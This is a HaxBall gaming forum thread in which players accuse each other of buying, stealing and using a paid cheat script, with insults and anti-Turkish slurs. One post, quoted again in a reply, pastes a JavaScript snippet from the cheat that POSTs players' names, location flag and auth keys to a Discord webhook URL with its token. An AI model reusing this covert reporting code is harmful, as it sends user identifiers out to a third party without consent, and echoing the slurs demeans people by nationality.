proof about amp and another cheater

Talk about haxball in here, maps, sides, players, tactics, anything related to the game.

proof about amp and another cheater

Postby Rose02 » July 7th, 2022, 4:10 pm

Hello everyone, I'm Rose an italian player, right now i'm just playing some fs without playing official cause i don't have much time.
Recently I bought hack from Punisher talking to him in pm just to stole his script and talking to basro for trying to fix it.
While talking with him, i was doing like i didn't want buy the scripts because maybe they were fake, and look what he wrote to me?

That aMp and Marble has their cheats, now you know why he said that aMp doesn't use it, maybe because is one of his loyal buyer. Enjoy now why aMp from pubblic player became Misaj (another cheater).

ps. hxgd is Punisher , gl hf sell script and open post for ban xd

Rose02

News Articles: 0

Position: Forward

Re: proof about amp and another cheater

Postby hxgd » July 7th, 2022, 4:11 pm

Before you buy the hack, you keep asked me If I am gonna scam you, and I said you can ask this two players that hack is real (like not some imaginary shit). That doesn't mean either I, aMp or Marble is using this hack. You are too fucking dumb to understand that, also thanks for exposing that you use hacks.

I have 10 days of logs on my discord where you used that hack every day. As you can see B ull and you used this hack for 10 days. Thanks for revealing yourself. ^^

And clear statement here: I am not using this hack. If you want to buy I can sell you, cause in Turkey any euro is x17. Why would I refuse this chance? But that doesn't mean you can use this hack here in FeedMe officials or fses. You can buy from me and keep using it in shit Italian leagues or in your local room.

So pretty much you wasted your 50 euro and thanks for exposing yourself.

Last edited by hxgd on July 7th, 2022, 4:13 pm, edited 1 time in total.
hxgd

Postby nik » July 7th, 2022, 4:13 pm

funnysher if u have that logins can u screenshot where i used this hack :D :D :D :D :D

nik

Position: Attacking Midfielder

Postby Rose02 » July 7th, 2022, 4:13 pm

We log your site just to stole your script and it works, thank you pathetic dumbass ^^ Now your script will be fixed and you won't get any money

Rose02

Postby gio » July 7th, 2022, 4:14 pm

I just hope admins will ban this abort from this community. This kebab doesn't deserve to stay in this forum since all this shit happens cause this Punisher is a poor guy needs to make script for money

Of course Rose had a nick fake when he was talking with haxgod on Discord, that's why he said to ask aMp or Marble for cheats ^^

Last edited by gio on July 7th, 2022, 4:18 pm, edited 2 times in total.
gio

Position: Defensive Midfielder
Division 2 Winner: Season 5

Postby hxgd » July 7th, 2022, 4:15 pm

Rose02 wrote:We log your site just to stole your script and it works, thank you pathetic dumbass ^^ Now your script will be fixed and you won't get any money

Dumbo you just bought a script that already is a public. Even Enzo had it hahahaha. You paid for a public shit now you can share it anywhere I don't care. I already got enough money now you can flex around it. Hhhhh

hxgd

Postby BullHax27 » July 7th, 2022, 4:15 pm

they gave me the demo to help ROSE steal your script. he will never use them in the feed mee league because I respect the moderators

bye

BullHax27

Postby hxgd » July 7th, 2022, 4:17 pm

BullHax27 wrote:they gave me the demo to help ROSE steal your script. he will never use them in the feed mee league because I respect the moderators

bye

Hahahahahah fucking liar. In the screenshot you see your authkey? I have logs of that authkey using the hack for 10 days since you guys bought it. You want me to share it? How is a test takes 10 days hahahahaha.

hxgd

Postby Rose02 » July 7th, 2022, 4:20 pm

you gave us access on 2 and we accessed your site, I did it on 5 to fuck the script and see it, I don't understand why you keep saying about the 10 days of log, the session variables you had in the your script you got with post function locally not started, sorry, don't keep bullshit liar

fetch("https://discord.com/api/webhooks/991880571011727381/BUqln2CUR0ZDR3hgLh0bruPmeSNxD88GaXTLJtCHz5Yrqpr3f3TtJj8jNbZa8IHPeu7m", {
method: 'POST',
body: JSON.stringify({
"content": \n \n \n \n Player Name: ${playerName} \n Extrapolation: ${extra} \n Flag: :flag_${geo}: \n Joined Room: ${joinedRoom} \n Hack Used At: ${currentTime} \n Player Auth Key: ${authKey} \n \n \n \n,
"username": "Someone Used Hack"
}),
headers: {
'Content-Type': 'application/json'
}
}).then(res => res);
},5000);

Rose02

Postby Naticooo » July 7th, 2022, 4:20 pm

if everyone has the hack, it is no longer a problem.

Gimme that shit

Naticooo

Postby BullHax27 » July 7th, 2022, 4:22 pm

Punisher wrote:Image

Before you buy the hack, you keep asked me If I am gonna scam you, and I said you can ask this two players that hack is real (like not some imaginary shit). That doesn't mean either I, aMp or Marble is using this hack. You are too fucking dumb to understand that, also thanks for exposing that you use hacks.

I have 10 days of logs on my discord where you used that hack every day. As you can see B ull and you used this hack for 10 days. Thanks for revealing yourself. ^^

And clear statement here: I am not using this hack. If you want to buy I can sell you, cause in Turkey any euro is x17. Why would I refuse this chance? But that doesn't mean you can use this hack here in FeedMe officials or fses. You can buy from me and keep using it in shit Italian leagues or in your local room.

So pretty much you wasted your 50 euro and thanks for exposing yourself.

poor child I only went in that day 2/07 to help rose steal you now back in your sewer I don't need your hacks to win

BullHax27

Postby ROCKYBALBOA » July 7th, 2022, 4:23 pm

i don't know what to say.i am in shock :afraid: matches should not be played until these events are over. Dogan, where are you, please explain, or are you using cheats too? isn't it time to do something?

note: sarcasm

i respect everyone's opinion, but if we can't come up with a solution, there is no point in writing them here.i watched a league match the other day and both sides were accusing each other of cheating.2 years ago we were talking about macro, not cheating, what changed until the kick limit came.Even in a forum that Basro doesn't know about, instead of opening this issue, we should gather hundreds of people and talk about them where we can reach him. I'm tired of seeing fights every time I see it. everyone blames each other i guess there is no one left who is not blamed except me because i don't try x fake. If someone is selling cheats, they should be banned, those who distribute it just to cause chaos like the hulk should be banned.
but most people just tried the hack like rose they don't use it.i haven't tried it, I don't know what it's like, but stop treating every person who tries it like a cheater. In short, those who distribute and sell this trick should be banned. and this thread should be opened in a place where basro can see it and hundreds of people should support it. Although these topics was opened in good faith, it did not do anything except spread the cheat

Last edited by ROCKYBALBOA on July 7th, 2022, 4:38 pm, edited 1 time in total.
ROCKYBALBOA

Position: Attacking Midfielder

Postby hxgd » July 7th, 2022, 4:25 pm

Rose02 wrote:you gave us access on 2 and we accessed your site, I did it on 5 to fuck the script and see it, I don't understand why you keep saying about the 10 days of log, the session variables you had in the your script you got with post function locally not started, sorry, don't keep bullshit liar

fetch("https://discord.com/api/webhooks/991880571011727381/BUqln2CUR0ZDR3hgLh0bruPmeSNxD88GaXTLJtCHz5Yrqpr3f3TtJj8jNbZa8IHPeu7m", {
method: 'POST',
body: JSON.stringify({
"content": \n \n \n \n Player Name: ${playerName} \n Extrapolation: ${extra} \n Flag: :flag_${geo}: \n Joined Room: ${joinedRoom} \n Hack Used At: ${currentTime} \n Player Auth Key: ${authKey} \n \n \n \n,
"username": "Someone Used Hack"
}),
headers: {
'Content-Type': 'application/json'
}
}).then(res => res);
},5000);

AHAHAHAH Dumbass.
So this is someone which he is not from the feedme, he is from a another community. And he is using site version which you found that discord log code, as you can see any of the logs from site users the link has come to discord with a.haxball.com (you can check in photo)

While in your screenshots you guys used the local one (no a.haxball all original links) which I never give test of. It was the script I send after having the payment. So keep lying more. I have proofs ^^

hxgd

Postby Rose02 » July 7th, 2022, 4:26 pm

punisher can you give me the HD version of haxball too? it is really beautiful :D

https://streamable.com/llmc4x

Rose02

Postby hxgd » July 7th, 2022, 4:27 pm

If someone is wondering it was the one who bought the cheat was B ull.

Later he give it to Rose, in my logs I can see the first user who joined this hack auth key is same as the one with B ull's authkey in the photo.

And that auth key just played game with that hack for 10 days.

Rose is only helped him to steal code I think.

hxgd

Postby Wilbekin8 » July 7th, 2022, 4:28 pm

All those who complain about cheating are using cheats or those who argue that their friends do not use :fp: :evil: :roll:

Wilbekin8

Postby KLEINN » July 7th, 2022, 4:29 pm

Öncelikle Merhabalar boşverin oyunu gelin size Cağ kebabı tarifi vereyim;

Cağ Kebabının Tarifine Başlamadan İçindekileri Sunuyoruz
Kebabımız kuzu eti, kaya tuzu, karabiber ve soğandan oluşur. 55 kilogram et için oranları aşağıdaki gibidir.

55 Kg. Kuzu Eti (2 Bütün Kuzu)

200 Gr. İnceltilmiş Kaya Tuzu

150 Gr. Karabiber
-----------------------------------------------------
First of all, let me give you the Cağ kebab recipe;

Before Starting the Recipe of Cağ Kebab, We Present the Ingredients
Our kebab consists of lamb, rock salt, black pepper and onion. The proportions for 55 kilograms of meat are as follows.

55 kg. Lamb Meat (2 Whole Lambs)

200 gr. Refined Rock Salt

150 gr. Black pepper

Last edited by KLEINN on July 7th, 2022, 4:31 pm, edited 1 time in total.
KLEINN

Position: Goalkeeper

Postby Rose02 » July 7th, 2022, 4:30 pm

I did not know that you could pass me the php variables of my sessions in public, well, what about, if you want to join in and play some games from og bot in 3v3 next time, I will choose you ;)

Rose02

Postby BullHax27 » July 7th, 2022, 4:30 pm

ROCKYBALBOA wrote:i don't know what to say.i am in shock :afraid: matches should not be played until these events are over. Dogan, where are you, please explain, or are you using cheats too? isn't it time to do something?

as long as there are Turks as punishers this haxball will always be shit

BullHax27

Postby aMp » July 7th, 2022, 4:30 pm

I am not even playing and you keep talking about me thanks for keeping me alive what can I say
Seriously didn't I like show you my screen in discord for 1 hour aswell to others israelian players and you still say that I use it
You realise after it will be clear that I don't have it how childish and stupid it will look from both of you 2 (adults) to keep an subject alive for 3 weeks without any proof
And well done you "stole the script " but you still pay him so idk who is winning in here xd he still sees everytime you use it and it will be obvious when you will use it in officials
And idk what public player to "misaj level" because you still couldn't beat me in 2018 xd to 2021 whole time when I was using 0 extrapolation some players are just better in the game just accept it lmao
As with marble he doesn't use it because he is another retard who keep saying that I use it xd
Who is using the cheat its obv af and when I told (some admins about this hack) they started laughing in my face and saying its not possible but w.e

Yea bull gio Rose I am using the cheat and you won against me with the cheat you are damn good in this game i will send you some awards from mine maybe you will be happy

You are defined by two things:
The patience when you've got nothing.
and the attitude when you've got everything.
aMp

Next

Return to General Haxball Discussion